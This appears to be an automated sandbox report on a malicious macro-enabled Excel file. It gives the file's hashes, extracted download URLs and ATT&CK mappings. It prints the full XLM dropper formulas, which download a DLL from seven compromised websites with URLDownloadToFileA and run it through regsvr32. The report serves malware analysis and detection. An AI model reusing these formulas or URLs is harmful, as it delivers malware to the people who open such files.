Overview

overview

10

Static

static

10

spreadsheet.xlsm

windows7-x64

10

spreadsheet.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    spreadsheet.xlsm

  • Size

    48KB

  • Sample

    230124-ag6xtsga75

  • MD5

    c16e305c08dc20f3661f466d0a4f82bd

  • SHA1

    439fdd1d3962e48c01f74e978492d0de412f99c3

  • SHA256

    4ac3cfd7ad8cf62e160f55053626f2a2a1cf14ca1045220bb88e38d8e7771001

  • SHA512

    f9830c9c09dab3cd82b298c6ce62502d41b7670378b4e0dba4fa46a732f3839c896693929eae491f710a74480b0ffbdcd40450793b43fcd3772c872894889399

  • SSDEEP

    1536:1lFXmY3B6Y8r7mfqN1+TpCgcgsMA6VIcrW:1l1mG4YqVN1+TtRrW

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.arkpp.com/ARIS-BSU/9K1/

http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/

http://www.babylinesl.com/catalog/iVsl6YvlyIyX/

https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/

https://unada.us/acme-challenge/3NXwcYNCa/

https://automobile-facile.fr/wp-admin/QV/

https://alebit.de/css/gqKtdKmTsC4iDh/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arkpp.com/ARIS-BSU/9K1/","..\fbd.dll",0,0) =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/","..\fbd.dll",0,0)) =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.babylinesl.com/catalog/iVsl6YvlyIyX/","..\fbd.dll",0,0)) =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/","..\fbd.dll",0,0)) =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://unada.us/acme-challenge/3NXwcYNCa/","..\fbd.dll",0,0)) =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://automobile-facile.fr/wp-admin/QV/","..\fbd.dll",0,0)) =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alebit.de/css/gqKtdKmTsC4iDh/","..\fbd.dll",0,0)) =IF('EGVEB'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.arkpp.com/ARIS-BSU/9K1/

Targets

    • Target

      spreadsheet.xlsm

    • Size

      48KB

    • MD5

      c16e305c08dc20f3661f466d0a4f82bd

    • SHA1

      439fdd1d3962e48c01f74e978492d0de412f99c3

    • SHA256

      4ac3cfd7ad8cf62e160f55053626f2a2a1cf14ca1045220bb88e38d8e7771001

    • SHA512

      f9830c9c09dab3cd82b298c6ce62502d41b7670378b4e0dba4fa46a732f3839c896693929eae491f710a74480b0ffbdcd40450793b43fcd3772c872894889399

    • SSDEEP

      1536:1lFXmY3B6Y8r7mfqN1+TpCgcgsMA6VIcrW:1l1mG4YqVN1+TtRrW

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks